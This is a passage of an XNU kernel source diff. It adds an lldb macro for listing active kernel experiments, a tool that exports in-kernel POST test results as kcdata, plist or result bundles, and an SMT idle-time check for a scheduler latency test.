-    IterateSysctls(kern.globals.sysctl__children, None, 0)
 
+    for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children, _ShowSysctl_prefix):
+        if parentstr == "":
+            parentstr = "<none>"
+        headp = sysctl
+        st = (" " * depth * 2) + str(sysctl.GetSBValue().Dereference()).replace("\n", "\n" + (" " * depth * 2))
+        print 'parent = "%s"' % parentstr, st[st.find("{"):]
+
+@lldb_command('showexperiments', 'F')
+def ShowExperiments(cmd_args=[], cmd_options={}):
+    """ Shows any active kernel experiments being run on the device via trial.
+        Arguments:
+        -F: Scan for changed experiment values even if no trial identifiers have been set.
+    """
+
+    treatment_id = str(kern.globals.trial_treatment_id)
+    experiment_id = str(kern.globals.trial_experiment_id)
+    deployment_id = kern.globals.trial_deployment_id._GetValueAsSigned()
+    if treatment_id == "" and experiment_id == "" and deployment_id == -1:
+        print("Device is not enrolled in any kernel experiments.")
+        if not '-F' in cmd_options:
+            return
+    else:
+        print("""Device is enrolled in a kernel experiment:
+    treatment_id: %s
+    experiment_id: %s
+    deployment_id: %d""" % (treatment_id, experiment_id, deployment_id))
+
+    print("Scanning sysctl tree for modified factors...")
+
+    kExperimentFactorFlag = 0x00100000
+    
+    formats = {
+            "IU": gettype("unsigned int *"),
+            "I": gettype("int *"),
+            "LU": gettype("unsigned long *"),
+            "L": gettype("long *"),
+            "QU": gettype("uint64_t *"),
+            "Q": gettype("int64_t *")
+    }
 
+    for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children):
+        if sysctl.oid_kind & kExperimentFactorFlag:
+            spec = cast(sysctl.oid_arg1, "struct experiment_spec *")
+            # Skip if arg2 isn't set to 1 (indicates an experiment factor created without an experiment_spec).
+            if sysctl.oid_arg2 == 1:
+                if spec.modified == 1:
+                    fmt = str(sysctl.oid_fmt)
+                    ptr = spec.ptr
+                    t = formats.get(fmt, None)
+                    if t:
+                        value = cast(ptr, t)
+                    else:
+                        # Unknown type
+                        continue
+                    name = str(parentstr) + "." + str(sysctl.oid_name)
+                    print("%s = %d (Default value is %d)" % (name, dereference(value), spec.original_value))
 
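A sketch of the expected interaction in an lldb session with the macros loaded, on a device that is not enrolled in a trial (factor output omitted):

    (lldb) showexperiments
    Device is not enrolled in any kernel experiments.
    (lldb) showexperiments -F
    Device is not enrolled in any kernel experiments.
    Scanning sysctl tree for modified factors...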
 from memory import *
 from process import *
@@ -1240,3 +1303,4 @@ from ulock import *
 from ntstat import *
 from zonetriage import *
 from sysreg import *
+from counter import *
index 2c929f93fab173bf520a6e7f72874f59bf336eb2..a385e3dbb90bb1edd41d29ffd2f83384a6d06849 100644 (file)
@@ -33,6 +33,7 @@ COMMON_TARGETS = unit_tests \
                perf_index              \
                personas                \
                unixconf                \
+               kernpost_test_report \
 
 KEXT_TARGETS = pgokext.kext
 
diff --git a/tools/tests/kernpost_test_report/Makefile b/tools/tests/kernpost_test_report/Makefile
new file mode 100644 (file)
index 0000000..0181a87
--- /dev/null
@@ -0,0 +1,18 @@
+include ../Makefile.common
+
+DSTROOT?=$(shell /bin/pwd)
+SYMROOT?=$(shell /bin/pwd)
+OBJROOT?=$(shell /bin/pwd)
+
+CC:=$(shell xcrun -sdk "$(SDKROOT)" -find cc)
+
+CFLAGS:=$(ARCH_FLAGS) -g -Wall -Os -isysroot $(SDKROOT) -I$(SDKROOT)/System/Library/Frameworks/System.framework/PrivateHeaders -lkdd -framework Foundation
+
+all: $(DSTROOT)/kernpost_test_report
+
+$(DSTROOT)/kernpost_test_report: kernpost_test_report.m
+       $(CC) -o $@ $^ $(subst -arch i386,,$(CFLAGS))
+
+clean:
+       rm -f $(DSTROOT)/kernpost_test_report $(OBJROOT)/*.o
+       rm -rf $(SYMROOT)/*.dSYM
diff --git a/tools/tests/kernpost_test_report/kernpost_test_report.m b/tools/tests/kernpost_test_report/kernpost_test_report.m
new file mode 100644 (file)
index 0000000..76d81a0
--- /dev/null
@@ -0,0 +1,379 @@
+#import <Foundation/Foundation.h>
+#include <kcdata.h>
+#import <kdd.h>
+#include <mach/mach_time.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/param.h>
+#include <sys/stat.h>
+#include <sys/sysctl.h>
+#include <sysexits.h>
+#include <unistd.h>
+
+#define FREE_BUF(_buf)   \
+       do {                 \
+               if (_buf) {      \
+                       free(_buf);  \
+                       _buf = NULL; \
+               }                \
+	} while (0)
+
+#define ERR(_msg_format, ...) fprintf(stderr, "error: " _msg_format "\n", ##__VA_ARGS__)
+
+#define PERR(_msg) perror("error: " _msg)
+
+/* XNUPost KCData constants */
+NSString * const kXNUPostKCDataKeyTestConfig      = @"xnupost_testconfig";
+NSString * const kXNUPostKCDataKeyOSVersion       = @"osversion";
+NSString * const kXNUPostKCDataKeyBootargs        = @"boot_args";
+NSString * const kXNUPostKCDataKeyMachTBInfo      = @"mach_timebase_info";
+NSString * const kXNUPostKCDataKeyMachTBInfoDenom = @"denom";
+NSString * const kXNUPostKCDataKeyMachTBInfoNumer = @"numer";
+NSString * const kXNUPostKCDataKeySubTestConfig   = @"xnupost_test_config";
+NSString * const kXNUPostKCDataKeyTestName        = @"test_name";
+NSString * const kXNUPostKCDataKeyBeginTime       = @"begin_time";
+NSString * const kXNUPostKCDataKeyEndTime         = @"end_time";
+NSString * const kXNUPostKCDataKeyRetval          = @"retval";
+NSString * const kXNUPostKCDataKeyExpectedRetval  = @"expected_retval";
+
+/* Resultbundle info constants */
+NSString * const kRBInfoKeyVersion         = @"version";
+NSString * const kRBInfoKeyCategory        = @"test_category";
+NSString * const kRBInfoKeyTestID          = @"test_id";
+NSString * const kRBInfoKeyProject         = @"Project";
+NSString * const kRBInfoKeyBootargs        = @"boot-args";
+NSString * const kRBInfoKeyOSVersion       = @"osVersion";
+NSString * const kRBInfoKeyResultCode      = @"result_code";
+NSString * const kRBInfoKeyResultStarted   = @"result_started";
+NSString * const kRBInfoKeyResultFinished  = @"result_finished";
+NSString * const kRBInfoKeyMachTBInfo      = @"mach_timebase_info";
+NSString * const kRBInfoKeyMachTBInfoDenom = @"denom";
+NSString * const kRBInfoKeyMachTBInfoNumer = @"numer";
+NSString * const kRBInfoKeyBeginTimeRaw    = @"beginTimeRaw";
+NSString * const kRBInfoKeyEndTimeRaw      = @"endTimeRaw";
+
+NSNumber * const kResultBundleVersion  = @2;
+NSString * const kResultBundleCategory = @"unittest";
+NSString * const kResultBundleProject  = @"xnu";
+NSNumber * const kResultCodePass       = @200;
+NSNumber * const kResultCodeFail       = @400;
+
+#define COMMAND_EXPORT (0)
+static int g_command = COMMAND_EXPORT;
+#define OUTPUT_FORMAT_RAW (0)
+#define OUTPUT_FORMAT_PLIST_XML (1)
+#define OUTPUT_FORMAT_RESULTBUNDLE (2)
+static int g_output_format = OUTPUT_FORMAT_RAW;
+static char * g_output_dir = NULL;
+
+static void
+usage(void)
+{
+       const char * progname = getprogname();
+       fprintf(stderr,
+               "Usage:\t%s COMMAND [OPTIONS]\n\n"
+               "\t%s export -o OUTPUT_DIR_PATH [-f raw|plist|resultbundle]\n"
+               "\nSupported command:\n"
+               "\texport\n",
+               progname, progname);
+}
+
+static void
+parse_export_options(int argc, char * argv[])
+{
+       int ch;
+       bool error = false;
+
+       while ((ch = getopt(argc, argv, "o:f:")) != -1) {
+               switch (ch) {
+               case 'o':
+                       g_output_dir = optarg;
+                       break;
+               case 'f':
+                       if (strncmp(optarg, "raw", 4) == 0) {
+                               g_output_format = OUTPUT_FORMAT_RAW;
+                       } else if (strncmp(optarg, "plist", 6) == 0) {
+                               g_output_format = OUTPUT_FORMAT_PLIST_XML;
+                       } else if (strncmp(optarg, "resultbundle", 13) == 0) {
+                               g_output_format = OUTPUT_FORMAT_RESULTBUNDLE;
+                       } else {
+                               error = true;
+                       }
+                       break;
+               default:
+                       error = true;
+                       break;
+               }
+       }
+
+       if (g_output_dir == NULL) {
+               error = true;
+       }
+
+       struct stat path_stat;
+       if (stat(g_output_dir, &path_stat)) {
+               PERR("Failed to access output dir");
+               error = true;
+       } else if (!S_ISDIR(path_stat.st_mode)) {
+		ERR("Output path must be a directory");
+               error = true;
+       }
+
+       if (error) {
+               usage();
+               exit(EX_USAGE);
+       }
+}
+
+static void
+parse_options(int argc, char * argv[])
+{
+       if (argc > 1) {
+               char * cmd = argv[1];
+               argc--;
+               argv++;
+               if (strncmp(cmd, "export", 7) == 0) {
+                       g_command = COMMAND_EXPORT;
+                       parse_export_options(argc, argv);
+               } else {
+                       usage();
+                       exit(EX_USAGE);
+               }
+       } else {
+               usage();
+               exit(EX_USAGE);
+       }
+}
+
+static void
+retrieve_test_data(void ** raw_buf_p, size_t * raw_size_p)
+{
+       int rc = sysctlbyname("debug.xnupost_get_tests", NULL, raw_size_p, NULL, 0);
+       if (rc == 0 && *raw_size_p > 0) {
+               *raw_buf_p = malloc(*raw_size_p);
+               if (*raw_buf_p) {
+                       rc = sysctlbyname("debug.xnupost_get_tests", *raw_buf_p, raw_size_p, NULL, 0);
+                       if (0 != rc) {
+                               PERR("Failed to get KCData through sysctl");
+                       }
+               } else {
+                       PERR("Failed to allocate KCData raw buffer");
+               }
+       } else {
+               PERR("Failed to get size through sysctl");
+       }
+}
+
+static void
+export_raw(void * raw_buf, size_t raw_size)
+{
+       if (raw_buf) {
+               char output_path[MAXPATHLEN];
+               snprintf(output_path, MAXPATHLEN, "%s/xnupost.kcdata", g_output_dir);
+               FILE * output_fp = fopen(output_path, "w");
+               if (output_fp) {
+                       fwrite(raw_buf, raw_size, 1, output_fp);
+                       fclose(output_fp);
+               } else {
+                       PERR("Failed to open output path");
+               }
+       }
+}
+
+static void
+export_to_plist(void * raw_buf, size_t raw_size)
+{
+       if (raw_buf) {
+               char output_path[MAXPATHLEN];
+               snprintf(output_path, MAXPATHLEN, "%s/xnupost.plist", g_output_dir);
+               NSError * nsError          = nil;
+               NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError);
+               if (parsed_dict) {
+                       NSData * plist_data = [NSPropertyListSerialization dataWithPropertyList:parsed_dict
+                                                                                        format:NSPropertyListXMLFormat_v1_0
+                                                                                       options:0
+                                                                                         error:&nsError];
+                       if (plist_data) {
+                               if (![plist_data writeToFile:[NSString stringWithUTF8String:output_path] atomically:YES]) {
+                                       ERR("Failed to write plist to %s", output_path);
+                               }
+                       } else {
+                               ERR("Failed to serialize result plist: %s", nsError.localizedDescription.UTF8String);
+                       }
+               } else {
+                       ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String);
+               }
+       }
+}
+
+#define RESULTBUNDLE_TIME_STR_SIZE (30) // 0000-00-00T00:00:00.000+00:00'\0'
+#define RESULTBUNDLE_TIME_MS_INDEX (20)
+#define RESULTBUNDLE_TIME_TZ_COLON_INDEX (26)
+#define RESULTBUNDLE_TIME_MS_STR_SIZE (4) // 000'\0'
+#define MSEC_PER_USEC 1000ull
+
+static void
+get_estimated_time_str_resultbundle(char * output_str, uint64_t mach_abs_time_usec)
+{
+       uint64_t est_usec          = mach_boottime_usec() + mach_abs_time_usec;
+       time_t est_sec             = (time_t)(est_usec / USEC_PER_SEC);
+       uint64_t est_usec_fraction = est_usec % USEC_PER_SEC;
+       struct tm tm_info;
+       int i = 0;
+
+       localtime_r(&est_sec, &tm_info);
+       strftime(output_str, RESULTBUNDLE_TIME_STR_SIZE, "%Y-%m-%dT%H:%M:%S.000%z", &tm_info);
+
+       /* Fill out milliseconds */
+       char ms_str[RESULTBUNDLE_TIME_MS_STR_SIZE] = {0};
+       snprintf(ms_str, RESULTBUNDLE_TIME_MS_STR_SIZE, "%03llu", est_usec_fraction / MSEC_PER_USEC);
+       for (i = 0; i < 3; i++) {
+		output_str[RESULTBUNDLE_TIME_MS_INDEX + i] = ms_str[i];
+       }
+
+       /* Add colon for timezone offset */
+	for (i = RESULTBUNDLE_TIME_STR_SIZE - 1; i > RESULTBUNDLE_TIME_TZ_COLON_INDEX; i--) {
+               output_str[i] = output_str[i - 1];
+       }
+	output_str[RESULTBUNDLE_TIME_TZ_COLON_INDEX] = ':';
+}
+
+static void
+create_subtest_bundle_config(NSDictionary * testconfig, NSDictionary * subtest, char * bundle_dir)
+{
+       NSString * testName    = subtest[kXNUPostKCDataKeyTestName];
+       NSNumber * tbInfoDenom = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoDenom];
+       NSNumber * tbInfoNumer = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoNumer];
+       struct mach_timebase_info tb_info;
+       tb_info.denom            = tbInfoDenom.unsignedIntValue;
+       tb_info.numer            = tbInfoNumer.unsignedIntValue;
+       NSNumber * beginTimeRaw  = subtest[kXNUPostKCDataKeyBeginTime];
+       NSNumber * endTimeRaw    = subtest[kXNUPostKCDataKeyEndTime];
+       uint64_t begin_time_usec = (beginTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC);
+       uint64_t end_time_usec   = (endTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC);
+	bool test_status = subtest[kXNUPostKCDataKeyRetval] &&
+	    [subtest[kXNUPostKCDataKeyRetval] isEqual:subtest[kXNUPostKCDataKeyExpectedRetval]];
+
+       char output_path[MAXPATHLEN];
+       char * output_dir_end = NULL;
+
+       snprintf(output_path, MAXPATHLEN, "%s/test_%s", bundle_dir, testName.UTF8String);
+       if (mkdir(output_path, 0777)) {
+               PERR("Failed to create subtest bundle dir");
+       }
+       output_dir_end = output_path + strlen(output_path);
+
+       *output_dir_end = '\0';
+       strlcat(output_path, "/Attachments", MAXPATHLEN);
+       if (mkdir(output_path, 0777)) {
+               PERR("Failed to create subtest Attachments dir");
+       }
+
+       *output_dir_end = '\0';
+       strlcat(output_path, "/Diagnostics", MAXPATHLEN);
+       if (mkdir(output_path, 0777)) {
+               PERR("Failed to create subtest Diagnostics dir");
+       }
+
+       NSMutableDictionary * rbInfo = [NSMutableDictionary new];
+       rbInfo[kRBInfoKeyVersion]    = kResultBundleVersion;
+       rbInfo[kRBInfoKeyCategory]   = kResultBundleCategory;
+       rbInfo[kRBInfoKeyTestID]     = testName;
+       rbInfo[kRBInfoKeyProject]    = kResultBundleProject;
+       rbInfo[kRBInfoKeyOSVersion]  = testconfig[kXNUPostKCDataKeyOSVersion];
+       rbInfo[kRBInfoKeyBootargs]   = testconfig[kXNUPostKCDataKeyBootargs];
+       rbInfo[kRBInfoKeyResultCode] = test_status ? kResultCodePass : kResultCodeFail;
+
+       char estimated_time_str[RESULTBUNDLE_TIME_STR_SIZE];
+       get_estimated_time_str_resultbundle(estimated_time_str, begin_time_usec);
+       rbInfo[kRBInfoKeyResultStarted] = [NSString stringWithUTF8String:estimated_time_str];
+       get_estimated_time_str_resultbundle(estimated_time_str, end_time_usec);
+       rbInfo[kRBInfoKeyResultFinished] = [NSString stringWithUTF8String:estimated_time_str];
+
+       rbInfo[kRBInfoKeyMachTBInfo] = @{kRBInfoKeyMachTBInfoDenom : tbInfoDenom, kRBInfoKeyMachTBInfoNumer : tbInfoNumer};
+
+       rbInfo[kRBInfoKeyBeginTimeRaw] = beginTimeRaw;
+       rbInfo[kRBInfoKeyEndTimeRaw]   = endTimeRaw;
+
+       *output_dir_end = '\0';
+       strlcat(output_path, "/Info.plist", MAXPATHLEN);
+       NSURL * output_url   = [NSURL fileURLWithFileSystemRepresentation:output_path isDirectory:NO relativeToURL:nil];
+       NSError * writeError = nil;
+       if (![rbInfo writeToURL:output_url error:&writeError]) {
+               ERR("Failed to write Info.plist file: %s", writeError.localizedDescription.UTF8String);
+       }
+
+       *output_dir_end = '\0';
+       strlcat(output_path, test_status ? "/PASS.status" : "/FAIL.status", MAXPATHLEN);
+       int fd = open(output_path, O_CREAT | O_TRUNC | O_WRONLY, 0666);
+       if (fd == -1) {
+               PERR("Failed to create subtest status file");
+       } else {
+               close(fd);
+       }
+}
+
+static void
+export_to_resultbundle(void * raw_buf, size_t raw_size)
+{
+       if (raw_buf) {
+               NSError * nsError          = nil;
+               NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError);
+               if (parsed_dict) {
+                       NSDictionary * testconfig = parsed_dict[kXNUPostKCDataKeyTestConfig];
+                       NSArray * subtests        = testconfig[kXNUPostKCDataKeySubTestConfig];
+
+                       char bundle_dir[MAXPATHLEN];
+                       snprintf(bundle_dir, MAXPATHLEN, "%s/xnupost", g_output_dir);
+                       if (mkdir(bundle_dir, 0777)) {
+                               PERR("Failed to create result bundle dir");
+                       }
+
+                       for (NSDictionary * subtest in subtests) {
+                               create_subtest_bundle_config(testconfig, subtest, bundle_dir);
+                       }
+               } else {
+                       ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String);
+               }
+       }
+}
+
+static void
+execute_export(void)
+{
+       void * raw_buf  = NULL;
+       size_t raw_size = 0;
+       retrieve_test_data(&raw_buf, &raw_size);
+       switch (g_output_format) {
+       case OUTPUT_FORMAT_PLIST_XML:
+               export_to_plist(raw_buf, raw_size);
+               break;
+       case OUTPUT_FORMAT_RESULTBUNDLE:
+               export_to_resultbundle(raw_buf, raw_size);
+               break;
+       case OUTPUT_FORMAT_RAW:
+       default:
+               export_raw(raw_buf, raw_size);
+               break;
+       }
+
+       FREE_BUF(raw_buf);
+}
+
+int
+main(int argc, char * argv[])
+{
+       parse_options(argc, argv);
+       switch (g_command) {
+       case COMMAND_EXPORT:
+               execute_export();
+               break;
+       default:
+               usage();
+               exit(EX_USAGE);
+               break;
+       }
+
+       return 0;
+}
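Example invocations of the new tool, one per supported output format; the output directory is illustrative and must already exist, since the tool stat()s it before exporting:

    kernpost_test_report export -o /tmp/xnupost -f raw
    kernpost_test_report export -o /tmp/xnupost -f plist
    kernpost_test_report export -o /tmp/xnupost -f resultbundle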
index e834ccdd0cc2f0251c7441e439a7ccd175bba60a..f8cccbefa4e30ff79bd26cd8f75cc7335398ed3a 100644 (file)
@@ -38,6 +38,7 @@
 #include <sysexits.h>
 #include <sys/sysctl.h>
 #include <getopt.h>
+#include <libproc.h>
 
 #include <spawn.h>
 #include <spawn_private.h>
 #include <stdatomic.h>
 
 #include <os/tsd.h>
+#include <os/lock.h>
 #include <TargetConditionals.h>
 
 typedef enum wake_type { WAKE_BROADCAST_ONESEM, WAKE_BROADCAST_PERTHREAD, WAKE_CHAIN, WAKE_HOP } wake_type_t;
-typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_FIXEDPRI } my_policy_type_t;
+typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_TIMESHARE_NO_SMT, MY_POLICY_FIXEDPRI } my_policy_type_t;
 
 #define mach_assert_zero(error)        do { if ((error) != 0) { fprintf(stderr, "[FAIL] error %d (%s) ", (error), mach_error_string(error)); assert(error == 0); } } while (0)
 #define mach_assert_zero_t(tid, error) do { if ((error) != 0) { fprintf(stderr, "[FAIL] Thread %d error %d (%s) ", (tid), (error), mach_error_string(error)); assert(error == 0); } } while (0)
@@ -229,7 +231,7 @@ static void
 create_churn_threads()
 {
        if (g_churn_count == 0) {
-               g_churn_count = g_numcpus - 1;
+               g_churn_count = g_test_rt_smt ? g_numcpus : g_numcpus - 1;
        }
 
        errno_t err;
@@ -417,6 +419,8 @@ parse_thread_policy(const char *str)
 {
        if (strcmp(str, "timeshare") == 0) {
                return MY_POLICY_TIMESHARE;
+       } else if (strcmp(str, "timeshare_no_smt") == 0) {
+               return MY_POLICY_TIMESHARE_NO_SMT;
        } else if (strcmp(str, "realtime") == 0) {
                return MY_POLICY_REALTIME;
        } else if (strcmp(str, "fixed") == 0) {
@@ -470,6 +474,9 @@ thread_setup(uint32_t my_id)
        switch (g_policy) {
        case MY_POLICY_TIMESHARE:
                break;
+       case MY_POLICY_TIMESHARE_NO_SMT:
+               proc_setthread_no_smt();
+               break;
        case MY_POLICY_REALTIME:
                /* Hard-coded realtime parameters (similar to what Digi uses) */
                pol.period      = 100000;
@@ -509,6 +516,20 @@ thread_setup(uint32_t my_id)
        return 0;
 }
 
+time_value_t
+get_thread_runtime(void)
+{
+       thread_basic_info_data_t info;
+       mach_msg_type_number_t info_count = THREAD_BASIC_INFO_COUNT;
+       thread_info(pthread_mach_thread_np(pthread_self()), THREAD_BASIC_INFO, (thread_info_t)&info, &info_count);
+
+       time_value_add(&info.user_time, &info.system_time);
+
+       return info.user_time;
+}
+
+time_value_t worker_threads_total_runtime = {};
+
 /*
  * Wait for a wakeup, potentially wake up another of the "0-N" threads,
  * and notify the main thread when done.
@@ -516,6 +537,8 @@ thread_setup(uint32_t my_id)
 static void*
 worker_thread(void *arg)
 {
+       static os_unfair_lock runtime_lock = OS_UNFAIR_LOCK_INIT;
+
        uint32_t my_id = (uint32_t)(uintptr_t)arg;
        kern_return_t kr;
 
@@ -736,6 +759,11 @@ worker_thread(void *arg)
                mach_assert_zero_t(my_id, kr);
        }
 
+       time_value_t runtime = get_thread_runtime();
+       os_unfair_lock_lock(&runtime_lock);
+       time_value_add(&worker_threads_total_runtime, &runtime);
+       os_unfair_lock_unlock(&runtime_lock);
+
        return 0;
 }
 
@@ -774,6 +802,29 @@ compute_stats(uint64_t *values, uint64_t count, float *averagep, uint64_t *maxp,
        *stddevp = _dev;
 }
 
+typedef struct {
+       natural_t sys;
+       natural_t user;
+       natural_t idle;
+} cpu_time_t;
+
+void
+record_cpu_time(cpu_time_t *cpu_time)
+{
+       host_cpu_load_info_data_t load;
+       mach_msg_type_number_t count = HOST_CPU_LOAD_INFO_COUNT;
+       kern_return_t kr = host_statistics(mach_host_self(), HOST_CPU_LOAD_INFO, (int *)&load, &count);
+       mach_assert_zero_t(0, kr);
+
+       natural_t total_system_time = load.cpu_ticks[CPU_STATE_SYSTEM];
+       natural_t total_user_time = load.cpu_ticks[CPU_STATE_USER] + load.cpu_ticks[CPU_STATE_NICE];
+       natural_t total_idle_time = load.cpu_ticks[CPU_STATE_IDLE];
+
+       cpu_time->sys = total_system_time;
+       cpu_time->user = total_user_time;
+       cpu_time->idle = total_idle_time;
+}
+
 int
 main(int argc, char **argv)
 {
@@ -787,6 +838,7 @@ main(int argc, char **argv)
        float           avg, stddev;
 
        bool test_fail = false;
+       bool test_warn = false;
 
        for (int i = 0; i < argc; i++) {
                if (strcmp(argv[i], "--switched_apptype") == 0) {
@@ -1026,6 +1078,11 @@ main(int argc, char **argv)
                usleep(g_iteration_sleeptime_us);
        }
 
+       cpu_time_t start_time;
+       cpu_time_t finish_time;
+
+       record_cpu_time(&start_time);
+
        /* Go! */
        for (uint32_t i = 0; i < g_iterations; i++) {
                uint32_t j;
@@ -1100,6 +1157,8 @@ main(int argc, char **argv)
                }
        }
 
+       record_cpu_time(&finish_time);
+
        /* Rejoin threads */
        for (uint32_t i = 0; i < g_numthreads; i++) {
                ret = pthread_join(threads[i], NULL);
@@ -1116,6 +1175,9 @@ main(int argc, char **argv)
                join_churn_threads();
        }
 
+       uint32_t cpu_idle_time = (finish_time.idle - start_time.idle) * 10;
+       uint32_t worker_threads_runtime = worker_threads_total_runtime.seconds * 1000 + worker_threads_total_runtime.microseconds / 1000;
+
        compute_stats(worst_latencies_ns, g_iterations, &avg, &max, &min, &stddev);
        printf("Results (from a stop):\n");
        printf("Max:\t\t%.2f us\n", ((float)max) / 1000.0);
@@ -1171,6 +1233,7 @@ main(int argc, char **argv)
                                    secondary ? " SECONDARY" : "",
                                    fail ? " FAIL" : "");
                        }
+                       test_warn |= (secondary || fail);
                        test_fail |= fail;
                        fail_count += fail;
                }
@@ -1181,6 +1244,17 @@ main(int argc, char **argv)
                }
        }
 
+       if (g_test_rt_smt && (g_each_spin_duration_ns >= 200000) && !test_warn) {
+               printf("cpu_idle_time=%dms worker_threads_runtime=%dms\n", cpu_idle_time, worker_threads_runtime);
+               if (cpu_idle_time < worker_threads_runtime / 4) {
+                       printf("FAIL cpu_idle_time unexpectedly small\n");
+                       test_fail = 1;
+               } else if (cpu_idle_time > worker_threads_runtime * 2) {
+                       printf("FAIL cpu_idle_time unexpectedly large\n");
+                       test_fail = 1;
+               }
+       }
+
        free(threads);
        free(g_thread_endtimes_abs);
        free(worst_latencies_ns);
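The pass band above converts the idle-tick delta to milliseconds (the * 10 presumably reflects the usual 100 Hz host tick) and requires it to sit between one quarter and twice the workers' combined runtime; a worked example with illustrative numbers:

    worker_threads_runtime = 2000        # ms, illustrative
    lower = worker_threads_runtime / 4   # 500 ms: below this -> "cpu_idle_time unexpectedly small"
    upper = worker_threads_runtime * 2   # 4000 ms: above this -> "cpu_idle_time unexpectedly large"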
@@ -1247,7 +1321,7 @@ static void __attribute__((noreturn))
 usage()
 {
        errx(EX_USAGE, "Usage: %s <threads> <chain | hop | broadcast-single-sem | broadcast-per-thread> "
-           "<realtime | timeshare | fixed> <iterations>\n\t\t"
+           "<realtime | timeshare | timeshare_no_smt | fixed> <iterations>\n\t\t"
            "[--trace <traceworthy latency in ns>] "
            "[--verbose] [--spin-one] [--spin-all] [--spin-time <nanos>] [--affinity]\n\t\t"
            "[--no-sleep] [--drop-priority] [--churn-pri <pri>] [--churn-count <n>]\n\t\t"